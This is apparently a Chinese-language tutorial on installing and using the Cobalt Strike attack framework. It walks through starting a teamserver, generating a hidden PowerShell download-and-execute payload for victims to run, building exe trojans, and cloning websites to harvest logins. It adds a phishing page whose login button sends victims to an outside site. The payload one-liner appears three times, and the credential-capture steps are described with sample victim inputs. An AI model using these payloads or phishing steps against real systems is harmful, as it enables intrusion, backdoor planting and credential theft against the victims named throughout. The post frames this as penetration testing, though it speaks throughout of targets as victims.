cobalt strike安装及使用方法
1.概述:
Cobalt Strike是一款的渗透测试工具:
- 拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能
- Cobalt Strike还可以调用Mimikatz等其他知名工具
- Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击
- Cobalt Strike采用C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透
2.安装
1.下载
官网:Access denied | cobaltstrike.com used Cloudflare to restrict access(中国的ip访问不了)
网盘:链接:https://pan.baidu.com/s/1UORpxIEvmu0je5a9JDtYNg (提取码:gira)
2.放入kali中解压缩
3.提权限
在自己的cs的文件夹界面打开终端
或者
cd 地址
提权命令:
chmod +x teamserver
4.运行服务端(我这里用的我自己的kali的公网ip)
使用指令查询公网ip地址
ifconfig
./teamserver 192.168.159.130 123456 格式(./teamserver 公网ip 密码)
注意:
这里的密码是一次性的每一次重新开启都重新设置
报错处理:
这里提示我权限不够
所以加上sudo(提高至管理员权限)
5.客户端运行
win会提示安全保护将他忽略执行即可
ip同上
端口默认50050不用改
用户名可以随意
密码同上
6.成功打开
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.159.130:80/a’))”
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.159.130:80/a’))”
3.使用
1.在监听区添加监听器
2.选择添加
![image-20240303175911389](C:\Users\26612\AppData\Roaming\Typora\typora-user-images\image-20240303175911389.png
3.web钓鱼
1.生成http的payload
2.设置监听
3.复制
在点击运行后会弹出一个窗口,这里需要将Cobalt Strike生成的Payload需要完整地复制下来,其中url它是个文件路径,就是让目标 (受害者)通过这个地址和端口下载 恶意脚本
命令:powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.10.20:80/a’))”
4.访问URL
URL:http://192.168.10.20/a
5.执行paylod
在目标主机上执行payload
这里我的理解是使用命令让其读取URL中代码进行后门植入。
执行的命令就是刚刚弹出提示的命令
4.exe文件马子
1.打开文件马子设置窗口
2.设置监听器
3.运行exe文件
4.发现主机上线
5.网站克隆
1.示例伪造目标
2.网站克隆
3.克隆网站配置
4.在受害者端输入克隆网站对应的ip
5.测试
1.测试数据
在钓鱼网站上输入账号:admin,密码:123456
2.客户端查看日志
6.钓鱼网站(克隆网站)拓展
1.在服务器端kali Linux里面下载phpstudy
wget -O install.sh https://notdocker.xp.cn/install.sh && sudo bash install.sh
2.浏览器访问上图内网连接,如果使用的是服务器的话,那就访问外网连接,然后输入上图的账号密码,并且启动下图两个服务
3.尝试使用受害者电脑访问服务器端的IP,可以连接上
4.对上述生成的钓鱼网站在浏览器控制台查看源码
5.在钓鱼网页找到登录按钮位置
6.以下代码添加进去
onclick=”window.location.href=’http://wvw.9377.com/login.php'”
7.把该钓鱼HTML文件拖到受害者端尝试打开
1.打开,并输入账号abc123,密码:qwe789
2.返回攻击端查看web日志,能监听
8.把钓鱼网站放到服务器上
9.在受害这端打开phpstudy路径
能打开,这时再次输入账号:llaa,密码:phpstudy
10.回到攻击者端查看cs的web日志,监听成功
可以随时监听钓鱼网站,而不用每次都得克隆网址了